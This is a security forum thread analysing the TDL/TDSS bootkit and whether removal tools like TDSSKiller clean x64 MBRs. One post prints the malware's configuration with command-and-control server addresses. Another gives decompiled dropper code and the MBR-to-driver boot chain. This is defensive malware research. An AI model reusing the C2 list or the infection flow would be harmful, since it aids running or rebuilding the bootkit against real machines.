[CloneRanger]

Originally Posted by Buster_BSA

I doubt SysInspector can be considered as a rootkit detector.

No, but it's still quite a useful tool :)

[fatdcuk]

My bossman just passed this one on to be shared.As is now routine the AV's struggling once again :roll:

http://www.virustotal.com/file-scan/rep ... 1283605266

[Fabian Wosar]

Ade's dropper's config:

Code: Select all

[main]
version=3.273
quote=Everybody's a jerk. You, me, this jerk. That's just my philosophy
botid=7452027a-de3a-4030-8cf2-b802b4661a92
affid=40694
subid=0
installdate=4.9.2010 13:25:17
builddate=3.9.2010 14:0:52
rnd=823518204
[injector]
*=tdlcmd.dll
[tdlcmd]
servers=https://nichtadden.in/;https://91.212.226.67/;https://li1i16b0.com/;https://zz87jhfda88.com/;https://n16fa53.com/;https://01n02n4cx00.cc/;https://lj1i16b0.com/
wspservers=http://zl00zxcv1.com/;http://zloozxcv1.com/;http://71ha6dl01.com/;http://axjau710h.com/;http://rf9akjgh716zzl.com/;http://dsg1tsga64aa17.com/;http://l1i1e3e3oo8as0.com/;http://7gafd33ja90a.com/;http://n1mo661s6cx0.com/
popupservers=http://clkh71yhks66.com/
version=3.941

[ConanTheLibrarian]

Looks like TDSSKiller can clean x64 MBR's now. Can anyone confirm? version 2.4.2.0.

[bytejammer]

Looks like TDSSKiller can clean x64 MBR's now. Can anyone confirm? version 2.4.2.0.

Confirmed. TDSSKiller 2.4.2.0 can clean x64 MBR.

[LeastPrivilege]

I've noticed that TDSSKiller "works" on Windows 7, but after a reboot replaces MBR code from Windows XP according to MBRCheck with a different SHA1 than the original Windows 7.

[EP_X0FF]

Does this bootkit working normally on x32, anybody? It renders x64 Windows XP to death BTW.

[t4L]

Seems strange but all samples I got from my sources and on this topic nothing related to x64 infection when unpacked? I havent had chance to test it on real x64, so I doubt it infects the MBR in the dropped driver. But if so, its nothing like ESET analysis, which states that "after infecting MBR, it exit with ExitWindowEx()" i.e it infects MBR from usermode.

Anyone can confirm this TDLx64 works like this: patch winload before it reaches OslArchTransferToKernel then patch uncompressed Bootmgr?

[nullptr]

Win 7 x64 (non virtual) - definitely uses SPTI to write direct to disk from usermode then ExitWindowsEx().

[EP_X0FF]

Yes it infects.

Code: Select all

    x64 = IsWindows64();   
    if ( x64 )
    {
      hInst = (int)GetModuleHandleA(0);
      result = WriteData(
             hInst,
             v6,
             Filenames[0],
             Filenames[1],
             Filenames[2],
             Filenames[3],
             Filenames[4],
             Filenames[5],
             Filenames[6],
             Filenames[7]);
      SetSelfDeletePending(0);
      if ( result )
      {
        if (NT_SUCCESS(RtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, TRUE, FALSE, &bPrev))
          ExitWindowsEx(0x12u, 0);
      }
      ExitProcess(0);
    }
   else
   {
/*
x86 mode
spooler based injection and infection for x86
*/
   } 

MBR -> ldr16 hooks int 13h, determines type of operation system and then go to ldr32/ldr64, IoCreateDriver for main code (stored inside drv32/drv64).